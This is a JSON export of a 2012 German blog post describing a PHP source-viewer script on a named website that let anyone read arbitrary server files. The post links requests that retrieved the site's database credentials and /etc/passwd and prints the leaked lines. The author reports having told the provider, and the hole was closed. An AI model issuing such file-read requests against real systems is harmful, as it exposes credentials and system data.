{"id":1608,"date":"2012-07-02T16:59:22","date_gmt":"2012-07-02T15:59:22","guid":{"rendered":"http:\/\/www.mitternachtshacking.de\/blog\/?p=1608"},"modified":"2015-07-17T21:22:20","modified_gmt":"2015-07-17T20:22:20","slug":"php-source-viewer","status":"publish","type":"post","link":"https:\/\/www.mitternachtshacking.de\/blog\/1608-php-source-viewer","title":{"rendered":"PHP-Source-Viewer"},"content":{"rendered":"<p>So ein PHP-Source-Viewer ist eine tolle Sache. Da kann man \u00fcber die Weboberfl\u00e4che direkt den Source Code einer PHP-Datei ankucken.<\/p>\n<p>Beispielsweise kann man kontrollieren ob <a href=\"http:\/\/www.michaelster.ch\/src_viewer.php?datei=lernen\/_index.php\">Benutzername und Passwort der Datenbank<\/a> korrekt eingetragen sind.<\/p>\n<pre> 46     $dbtype     = 'mysqli';     \/\/ db-Server-Typ        \r\n 47     $host       = 'localhost';     \/\/ Server                \r\n 48     $user       = 'root';        \/\/ Benutzer             \r\n 49     $password   = '';            \/\/ Passwort             \r\n 50     $dbase      = 'cms';        \/\/ db-Name<\/pre>\n<p>Oder ob noch <a href=\"http:\/\/www.michaelster.ch\/src_viewer.php?datei=\/etc\/passwd\">alle User in der Passwort-Datei<\/a> stehen.<\/p>\n<pre>  1 root:x:0:0:root:\/root:\/bin\/bash\r\n  2 bin:x:1:1:bin:\/bin:\/sbin\/nologin\r\n  3 daemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\r\n  4 adm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\r\n  5 lp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\r\n  6 sync:x:5:0:sync:\/sbin:\/bin\/sync<\/pre>\n<pre>226 michae2:x:10288:2524::\/home\/httpd\/vhosts\/michaelster.ch:\/bin\/false<\/pre>\n<p>Die Passw\u00f6rter selbst stehen leider in der Shadow, die der Webserver-Prozess nicht lesen darf. Spannend ist nat\u00fcrlich wenn man anhand der Passwort-Datei erkennen kann, welche Dom\u00e4nen auf dem Server gehostet werden.<\/p>\n<p>Ich hab dem Provider eine Mail geschickt. Mal sehen wie schnell das geschlossen wird.<\/p>\n<p>Aber das <a href=\"http:\/\/paste.rohitab.com\/132\">scheint \u00f6fter vorzukommen<\/a>.<\/p>\n<p><strong>Nachtrag:<\/strong> In zwei Stunden war die L\u00fccke zu.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So ein PHP-Source-Viewer ist eine tolle Sache. Da kann man \u00fcber die Weboberfl\u00e4che direkt den Source Code einer PHP-Datei ankucken. Beispielsweise kann man kontrollieren ob Benutzername und Passwort der Datenbank korrekt eingetragen sind. 46 $dbtype = &#8218;mysqli&#8216;; \/\/ db-Server-Typ 47 $host = &#8218;localhost&#8216;; \/\/ Server 48 $user = &#8218;root&#8216;; \/\/ Benutzer 49 $password = &#8220;; [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[8],"tags":[],"_links":{"self":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts\/1608"}],"collection":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/comments?post=1608"}],"version-history":[{"count":0,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts\/1608\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/media?parent=1608"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/categories?post=1608"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/tags?post=1608"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}